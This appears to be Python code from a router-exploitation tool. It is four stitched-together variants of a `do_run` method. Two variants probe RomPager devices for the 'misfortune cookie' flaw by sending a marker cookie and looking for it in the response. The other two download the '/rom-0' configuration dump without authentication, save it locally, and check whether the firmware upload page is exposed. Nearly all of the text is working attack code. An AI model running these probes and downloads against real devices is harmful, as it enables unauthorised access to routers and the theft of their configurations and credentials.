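def do_run(self, e):
    """Probe the target for RomPager and for the "misfortune cookie" reflection.

    Sends a single GET for '/blabla' (expected to produce a 404) carrying a
    marker cookie. The device is reported as vulnerable only when the
    response is a 404, its Server header contains 'RomPager', and the marker
    'omg1337hax' comes back in the response body. Results are reported
    through the print_* helpers; nothing is returned.

    A miss is not proof of safety: when RomPager answers without the marker
    the check only reports that the device "MAY still be vulnerable".

    Args:
        e: Not used by this method.
    """
    # Uncomment to trace the HTTP exchange:
    # httplib2.debuglevel = 1
    user_agent = 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)'
    # NOTE(review): 'en;q,0.3' is not a well-formed q-value (probably meant
    # 'en;q=0.3'); the header is left exactly as found.
    headers = {'User-Agent': user_agent,
               'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
               'Accept-language': 'sk,cs;q=0.8,en-US;q=0.5,en;q,0.3',
               'Connection': 'keep-alive',
               'Accept-Encoding': 'gzip, deflate',
               'Cache-Control': 'no-cache',
               'Cookie': 'C107373883=/omg1337hax'}

    # Plain HTTP to the configured host/port; the path is expected not to exist.
    target = 'http://' + self.host + ":" + self.port + '/blabla'

    h = httplib2.Http(timeout=60)
    h.follow_all_redirects = True

    # Only the network call can fail here, so keep the try block narrow.
    try:
        response, content = h.request(target, 'GET', headers=headers)
    except socket.timeout:
        print_error("Timeout!")
        return
    except (httplib2.HttpLib2Error, socket.error) as err:
        # Previously only timeouts were caught, so a refused connection or an
        # unresolvable host escaped as an unhandled exception.
        print_error("Connection failed: %s" % err)
        return

    if response.status != 404:
        print_failed("Unexpected HTTP status, expecting 404 got: %d" % response.status)
        print_red("Device is not running RomPager")
        return

    if 'server' not in response.keys():
        print_failed("Not running RomPager")
        return

    # NOTE(review): the Server header is supplied by the remote device and is
    # echoed to the operator's terminal as-is below.
    server = response.get('server')
    if 'RomPager' not in server:
        print_failed("RomPager not detected, device is running: %s " % server)
        return

    print_green("Got RomPager! Server:%s" % server)
    # Search the raw body bytes: the marker is plain ASCII, and a body that is
    # not valid UTF-8 made the former content.decode() raise.
    if b'omg1337hax' in content:
        print_success("device is vulnerable to misfortune cookie")
    else:
        print_failed("test didn't pass.")
        print_warning("Device MAY still be vulnerable")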
def do_run(self, e):
    """Check the target for RomPager and the "misfortune cookie" reflection.

    Issues one GET for '/blabla' with a marker cookie and reports the outcome
    through the print_* helpers. "Vulnerable" is printed only when the reply
    is a 404, the Server header contains 'RomPager', and the marker
    'omg1337hax' appears in the response text. When RomPager answers without
    the marker the result is inconclusive, not a clean bill of health.

    Args:
        e: Not used by this method.
    """
    # NOTE(review): 'en;q,0.3' in Accept-language is not a well-formed q-value
    # (probably meant 'en;q=0.3'); kept exactly as found.
    request_headers = {
        'User-Agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        'Accept-language': 'sk,cs;q=0.8,en-US;q=0.5,en;q,0.3',
        'Connection': 'keep-alive',
        'Accept-Encoding': 'gzip, deflate',
        'Cache-Control': 'no-cache',
        'Cookie': 'C107373883=/omg1337hax',
    }
    # Plain HTTP; the requested path is expected not to exist on the device.
    target = ''.join(('http://', self.host, ":", self.port, '/blabla'))

    try:
        reply = requests.get(target, headers=request_headers, timeout=60)

        status = reply.status_code
        if status != 404:
            print_failed("Unexpected HTTP status, expecting 404 got: %d" % status)
            print_red("Device is not running RomPager")
            return

        if 'server' not in reply.headers:
            print_failed("Not running RomPager")
            return

        # The Server header comes from the remote device and is printed as-is.
        banner = reply.headers.get('server')
        if 'RomPager' not in banner:
            print_failed("RomPager not detected, device is running: %s " % banner)
            return

        print_green("Got RomPager! Server:%s" % banner)
        marker_reflected = 'omg1337hax' in reply.text
        if not marker_reflected:
            print_failed("test didn't pass.")
            print_warning("Device MAY still be vulnerable")
            return

        print_success("device is vulnerable to misfortune cookie")
    except requests.exceptions.Timeout:
        print_error("Timeout!")
    except requests.exceptions.ConnectionError:
        # Any connection-level failure is reported with this one message.
        print_error("No route to host")
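def do_run(self, e):
    """Fetch '/rom-0' from the target and check whether rpFWUpload.html is reachable.

    Both requests are unauthenticated plain-HTTP GETs with a 60 second
    timeout. If '/rom-0' answers 200 with Content-Type exactly
    'application/octet-stream', the body is handed to core.io.writefile under
    the name "rom-0". Afterwards '/rpFWUpload.html' is requested and its
    availability is reported. Nothing is returned; results go through the
    print_* helpers.

    Args:
        e: Not used by this method.
    """
    target = "http://" + self.host + ":" + self.port
    try:
        response = requests.get(target + "/rom-0", timeout=60)
        content_type = 'application/octet-stream'
        if response.status_code == requests.codes.ok and response.headers.get('Content-Type') == content_type:
            print_success("got rom-0 file, size:" + str(len(response.content)))
            # NOTE(review): rom-0 is presumably a device configuration dump;
            # treat the saved copy as sensitive. Where writefile stores it is
            # not visible from here - confirm.
            core.io.writefile(response.content, "rom-0")
        else:
            print_error("failed")

        print_info("Checking if rpFWUpload.html is available")
        response = requests.get(target + "/rpFWUpload.html", timeout=60)
        if response.status_code == requests.codes.ok:
            print_success("rpFWUpload.html is accessible")
        else:
            print_failed("rpFWUpload.html is not accessible")
    except requests.exceptions.Timeout:
        print_error("timeout!")
    except requests.RequestException as err:
        # Previously every requests failure (refused connection, DNS error,
        # bad URL) was reported as "timeout!", which misled the operator.
        print_error("request failed: %s" % err)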
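def do_run(self, e):
    """Fetch '/rom-0' from the target and check whether rpFWUpload.html is reachable.

    Both requests are unauthenticated plain-HTTP GETs with a 60 second
    timeout. If '/rom-0' answers 200 with Content-Type exactly
    'application/octet-stream', the body is handed to core.io.writefile under
    the name "rom-0". Afterwards '/rpFWUpload.html' is requested and its
    availability is reported. Nothing is returned; results are printed.

    Args:
        e: Not used by this method.
    """
    target = "http://" + self.host + ":" + self.port
    try:
        response = requests.get(target + "/rom-0", timeout=60)
        content_type = 'application/octet-stream'
        got_binary = response.headers.get('Content-Type') == content_type
        if response.status_code == requests.codes.ok and got_binary:
            print_success("got rom-0 file, size:" + str(len(response.content)))
            # NOTE(review): rom-0 is presumably a device configuration dump;
            # treat the saved copy as sensitive. Where writefile stores it is
            # not visible from here - confirm.
            core.io.writefile(response.content, "rom-0")
        else:
            print_error("failed")

        print("Checking if rpFWUpload.html is available")
        response = requests.get(target + "/rpFWUpload.html", timeout=60)
        if response.status_code == requests.codes.ok:
            print_success("rpFWUpload.html is accessible")
        else:
            print_failed("rpFWUpload.html is not accessible")
    except requests.exceptions.Timeout:
        print_error("timeout!")
    except requests.RequestException as err:
        # Previously every requests failure (refused connection, DNS error,
        # bad URL) was reported as "timeout!", which misled the operator.
        print_error("request failed: %s" % err)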